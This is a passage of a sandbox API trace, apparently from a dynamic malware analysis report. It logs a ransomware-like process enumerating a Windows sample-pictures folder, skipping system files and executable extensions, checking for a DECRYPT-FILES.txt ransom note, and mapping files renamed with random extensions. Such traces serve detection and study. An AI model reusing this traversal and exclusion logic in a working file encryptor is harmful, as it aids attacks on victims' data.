lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="\\All Users") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="AhnLab") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.776] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.776] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.776] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\\\0a16c9.tmp") returned 52 [0186.776] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\pictures\\sample pictures\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0186.778] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.778] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.778] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\\\DECRYPT-FILES.txt") returned 59 [0186.778] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\pictures\\sample pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.778] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.778] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\*") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\*" [0186.778] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf208fd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf208fd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.778] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.778] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf208fd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf208fd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.778] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.778] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.778] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf208fd40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf208fd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf208fd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.779] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.779] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.779] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.779] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.779] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.779] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.779] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.779] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.779] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.779] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.779] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.779] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.779] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.779] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.779] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.779] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.779] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.779] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0186.779] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\0a16c9.tmp") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\0a16c9.tmp" [0186.779] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.779] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\0a16c9.tmp" (normalized: "c:\\users\\public\\pictures\\sample pictures\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.779] CloseHandle (hObject=0x0) returned 0 [0186.779] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.780] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb151d9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd6c2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrysanthemum.jpg.ozcBX", cAlternateFileName="CHRYSA~1.OZC")) returned 1 [0186.780] lstrcmpiW (lpString1="Chrysanthemum.jpg.ozcBX", lpString2="DECRYPT-FILES.txt") returned -1 [0186.780] lstrcmpiW (lpString1="Chrysanthemum.jpg.ozcBX", lpString2="autorun.inf") returned 1 [0186.780] lstrcmpiW (lpString1="Chrysanthemum.jpg.ozcBX", lpString2="boot.ini") returned 1 [0186.780] lstrcmpiW (lpString1="Chrysanthemum.jpg.ozcBX", lpString2="desktop.ini") returned -1 [0186.780] lstrcmpiW (lpString1="Chrysanthemum.jpg.ozcBX", lpString2="ntuser.dat") returned -1 [0186.780] lstrcmpiW (lpString1="Chrysanthemum.jpg.ozcBX", lpString2="iconcache.db") returned -1 [0186.780] lstrcmpiW (lpString1="Chrysanthemum.jpg.ozcBX", lpString2="bootsect.bak") returned 1 [0186.780] lstrcmpiW (lpString1="Chrysanthemum.jpg.ozcBX", lpString2="ntuser.dat.log") returned -1 [0186.780] lstrcmpiW (lpString1="Chrysanthemum.jpg.ozcBX", lpString2="thumbs.db") returned -1 [0186.780] lstrcmpiW (lpString1="Chrysanthemum.jpg.ozcBX", lpString2="Bootfont.bin") returned 1 [0186.780] lstrlenW (lpString="Chrysanthemum.jpg.ozcBX") returned 23 [0186.780] lstrcmpiW (lpString1="ozcBX", lpString2="lnk") returned 1 [0186.780] lstrcmpiW (lpString1="ozcBX", lpString2="exe") returned 1 [0186.780] lstrcmpiW (lpString1="ozcBX", lpString2="sys") returned -1 [0186.780] lstrcmpiW (lpString1="ozcBX", lpString2="dll") returned 1 [0186.780] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.780] lstrlenW (lpString="Chrysanthemum.jpg.ozcBX") returned 23 [0186.780] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0186.780] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Chrysanthemum.jpg.ozcBX" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.ozcBX") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.ozcBX" [0186.780] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.780] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.ozcBX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.ozcbx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.781] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=879658) returned 1 [0186.781] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.781] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3930000 [0186.781] UnmapViewOfFile (lpBaseAddress=0x3930000) returned 1 [0186.782] CloseHandle (hObject=0x268) returned 1 [0186.782] CloseHandle (hObject=0x264) returned 1 [0186.782] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.782] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb14d1700, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb14d1700, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb14d1700, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.782] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.782] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb1569c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xce97d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desert.jpg.sFGQeH", cAlternateFileName="")) returned 1 [0186.782] lstrcmpiW (lpString1="Desert.jpg.sFGQeH", lpString2="DECRYPT-FILES.txt") returned 1 [0186.782] lstrcmpiW (lpString1="Desert.jpg.sFGQeH", lpString2="autorun.inf") returned 1 [0186.782] lstrcmpiW (lpString1="Desert.jpg.sFGQeH", lpString2="boot.ini") returned 1 [0186.782] lstrcmpiW (lpString1="Desert.jpg.sFGQeH", lpString2="desktop.ini") returned -1 [0186.782] lstrcmpiW (lpString1="Desert.jpg.sFGQeH", lpString2="ntuser.dat") returned -1 [0186.782] lstrcmpiW (lpString1="Desert.jpg.sFGQeH", lpString2="iconcache.db") returned -1 [0186.782] lstrcmpiW (lpString1="Desert.jpg.sFGQeH", lpString2="bootsect.bak") returned 1 [0186.782] lstrcmpiW (lpString1="Desert.jpg.sFGQeH", lpString2="ntuser.dat.log") returned -1 [0186.782] lstrcmpiW (lpString1="Desert.jpg.sFGQeH", lpString2="thumbs.db") returned -1 [0186.782] lstrcmpiW (lpString1="Desert.jpg.sFGQeH", lpString2="Bootfont.bin") returned 1 [0186.782] lstrlenW (lpString="Desert.jpg.sFGQeH") returned 17 [0186.782] lstrcmpiW (lpString1="sFGQeH", lpString2="lnk") returned 1 [0186.782] lstrcmpiW (lpString1="sFGQeH", lpString2="exe") returned 1 [0186.782] lstrcmpiW (lpString1="sFGQeH", lpString2="sys") returned -1 [0186.782] lstrcmpiW (lpString1="sFGQeH", lpString2="dll") returned 1 [0186.782] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.782] lstrlenW (lpString="Desert.jpg.sFGQeH") returned 17 [0186.782] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0186.782] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Desert.jpg.sFGQeH" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.sFGQeH") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.sFGQeH" [0186.782] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.783] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.sFGQeH" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.sfgqeh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.783] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=846205) returned 1 [0186.783] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.783] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3930000 [0186.784] UnmapViewOfFile (lpBaseAddress=0x3930000) returned 1 [0186.784] CloseHandle (hObject=0x268) returned 1 [0186.784] CloseHandle (hObject=0x264) returned 1 [0186.784] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.784] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.784] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.784] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.784] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.784] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.784] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb158fde0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9165c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hydrangeas.jpg.bycJvvS", cAlternateFileName="HYDRAN~1.BYC")) returned 1 [0186.784] lstrcmpiW (lpString1="Hydrangeas.jpg.bycJvvS", lpString2="DECRYPT-FILES.txt") returned 1 [0186.784] lstrcmpiW (lpString1="Hydrangeas.jpg.bycJvvS", lpString2="autorun.inf") returned 1 [0186.784] lstrcmpiW (lpString1="Hydrangeas.jpg.bycJvvS", lpString2="boot.ini") returned 1 [0186.784] lstrcmpiW (lpString1="Hydrangeas.jpg.bycJvvS", lpString2="desktop.ini") returned 1 [0186.784] lstrcmpiW (lpString1="Hydrangeas.jpg.bycJvvS", lpString2="ntuser.dat") returned -1 [0186.784] lstrcmpiW (lpString1="Hydrangeas.jpg.bycJvvS", lpString2="iconcache.db") returned -1 [0186.784] lstrcmpiW (lpString1="Hydrangeas.jpg.bycJvvS", lpString2="bootsect.bak") returned 1 [0186.784] lstrcmpiW (lpString1="Hydrangeas.jpg.bycJvvS", lpString2="ntuser.dat.log") returned -1 [0186.784] lstrcmpiW (lpString1="Hydrangeas.jpg.bycJvvS", lpString2="thumbs.db") returned -1 [0186.784] lstrcmpiW (lpString1="Hydrangeas.jpg.bycJvvS", lpString2="Bootfont.bin") returned 1 [0186.784] lstrlenW (lpString="Hydrangeas.jpg.bycJvvS") returned 22 [0186.784] lstrcmpiW (lpString1="bycJvvS", lpString2="lnk") returned -1 [0186.785] lstrcmpiW (lpString1="bycJvvS", lpString2="exe") returned -1 [0186.785] lstrcmpiW (lpString1="bycJvvS", lpString2="sys") returned -1 [0186.785] lstrcmpiW (lpString1="bycJvvS", lpString2="dll") returned -1 [0186.785] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.785] lstrlenW (lpString="Hydrangeas.jpg.bycJvvS") returned 22 [0186.785] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0186.785] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Hydrangeas.jpg.bycJvvS" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.bycJvvS") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.bycJvvS" [0186.785] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.785] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.bycJvvS" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.bycjvvs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.785] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=595548) returned 1 [0186.785] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.785] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2b30000 [0186.786] UnmapViewOfFile (lpBaseAddress=0x2b30000) returned 1 [0186.786] CloseHandle (hObject=0x268) returned 1 [0186.786] CloseHandle (hObject=0x264) returned 1 [0186.786] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.786] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb15dc0a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xbd71e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jellyfish.jpg.QmoB", cAlternateFileName="JELLYF~1.QMO")) returned 1 [0186.786] lstrcmpiW (lpString1="Jellyfish.jpg.QmoB", lpString2="DECRYPT-FILES.txt") returned 1 [0186.786] lstrcmpiW (lpString1="Jellyfish.jpg.QmoB", lpString2="autorun.inf") returned 1 [0186.786] lstrcmpiW (lpString1="Jellyfish.jpg.QmoB", lpString2="boot.ini") returned 1 [0186.787] lstrcmpiW (lpString1="Jellyfish.jpg.QmoB", lpString2="desktop.ini") returned 1 [0186.787] lstrcmpiW (lpString1="Jellyfish.jpg.QmoB", lpString2="ntuser.dat") returned -1 [0186.787] lstrcmpiW (lpString1="Jellyfish.jpg.QmoB", lpString2="iconcache.db") returned 1 [0186.787] lstrcmpiW (lpString1="Jellyfish.jpg.QmoB", lpString2="bootsect.bak") returned 1 [0186.787] lstrcmpiW (lpString1="Jellyfish.jpg.QmoB", lpString2="ntuser.dat.log") returned -1 [0186.787] lstrcmpiW (lpString1="Jellyfish.jpg.QmoB", lpString2="thumbs.db") returned -1 [0186.787] lstrcmpiW (lpString1="Jellyfish.jpg.QmoB", lpString2="Bootfont.bin") returned 1 [0186.787] lstrlenW (lpString="Jellyfish.jpg.QmoB") returned 18 [0186.787] lstrcmpiW (lpString1="QmoB", lpString2="lnk") returned 1 [0186.787] lstrcmpiW (lpString1="QmoB", lpString2="exe") returned 1 [0186.787] lstrcmpiW (lpString1="QmoB", lpString2="sys") returned -1 [0186.787] lstrcmpiW (lpString1="QmoB", lpString2="dll") returned 1 [0186.787] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.787] lstrlenW (lpString="Jellyfish.jpg.QmoB") returned 18 [0186.787] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0186.787] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Jellyfish.jpg.QmoB" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.QmoB") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.QmoB" [0186.787] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.787] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.QmoB" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.qmob"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.787] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=775966) returned 1 [0186.787] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.787] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3930000 [0186.788] UnmapViewOfFile (lpBaseAddress=0x3930000) returned 1 [0186.788] CloseHandle (hObject=0x268) returned 1 [0186.788] CloseHandle (hObject=0x264) returned 1 [0186.788] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.789] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb1628360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xbeb27, dwReserved0=0x0, dwReserved1=0x0, cFileName="Koala.jpg.7L66R", cAlternateFileName="")) returned 1 [0186.789] lstrcmpiW (lpString1="Koala.jpg.7L66R", lpString2="DECRYPT-FILES.txt") returned 1 [0186.789] lstrcmpiW (lpString1="Koala.jpg.7L66R", lpString2="autorun.inf") returned 1 [0186.789] lstrcmpiW (lpString1="Koala.jpg.7L66R", lpString2="boot.ini") returned 1 [0186.789] lstrcmpiW (lpString1="Koala.jpg.7L66R", lpString2="desktop.ini") returned 1 [0186.789] lstrcmpiW (lpString1="Koala.jpg.7L66R", lpString2="ntuser.dat") returned -1 [0186.789] lstrcmpiW (lpString1="Koala.jpg.7L66R", lpString2="iconcache.db") returned 1 [0186.789] lstrcmpiW (lpString1="Koala.jpg.7L66R", lpString2="bootsect.bak") returned 1 [0186.789] lstrcmpiW (lpString1="Koala.jpg.7L66R", lpString2="ntuser.dat.log") returned -1 [0186.789] lstrcmpiW (lpString1="Koala.jpg.7L66R", lpString2="thumbs.db") returned -1 [0186.789] lstrcmpiW (lpString1="Koala.jpg.7L66R", lpString2="Bootfont.bin") returned 1 [0186.789] lstrlenW (lpString="Koala.jpg.7L66R") returned 15 [0186.789] lstrcmpiW (lpString1="7L66R", lpString2="lnk") returned -1 [0186.789] lstrcmpiW (lpString1="7L66R", lpString2="exe") returned -1 [0186.789] lstrcmpiW (lpString1="7L66R", lpString2="sys") returned -1 [0186.789] lstrcmpiW (lpString1="7L66R", lpString2="dll") returned -1 [0186.789] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.789] lstrlenW (lpString="Koala.jpg.7L66R") returned 15 [0186.789] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0186.789] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Koala.jpg.7L66R" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.7L66R") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.7L66R" [0186.789] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.789] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.7L66R" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.7l66r"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.789] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=781095) returned 1 [0186.790] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, 